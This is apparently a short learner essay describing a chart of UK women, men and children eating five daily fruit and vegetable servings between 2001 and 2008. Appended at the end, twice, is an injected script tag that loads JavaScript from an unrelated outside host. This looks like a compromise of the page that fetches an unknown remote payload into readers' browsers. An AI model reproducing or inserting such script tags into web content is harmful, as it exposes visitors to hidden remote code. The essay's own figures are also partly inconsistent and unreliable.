The graphic presents the number of UK people eating five fruit and vegetable servings each day over an 8 year period, from 2001 to 2008. It is noticed that the percentage of women is much greater than the percentage of men and children.
There was an approximate 2% increase every year in the number of UK women from 2001 to 2006 in which this group reached the highest peak of almost 35%. In contrast, both men and children groups stayed the same at 17% and 12% respectively during 2001 until 2003 and then they all experienced quite a rise of 10% for the men group and almost double for the children group between 2003 and 2006.
The last 2 year period from 2006 to 2008 was a slow fall to all 3 groups. Particularly, the women group dropped down to 30% in 2008 whereas the men group fell to 27% and the children group went up to around 26% in 2006 and then down to 24% in the last year.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
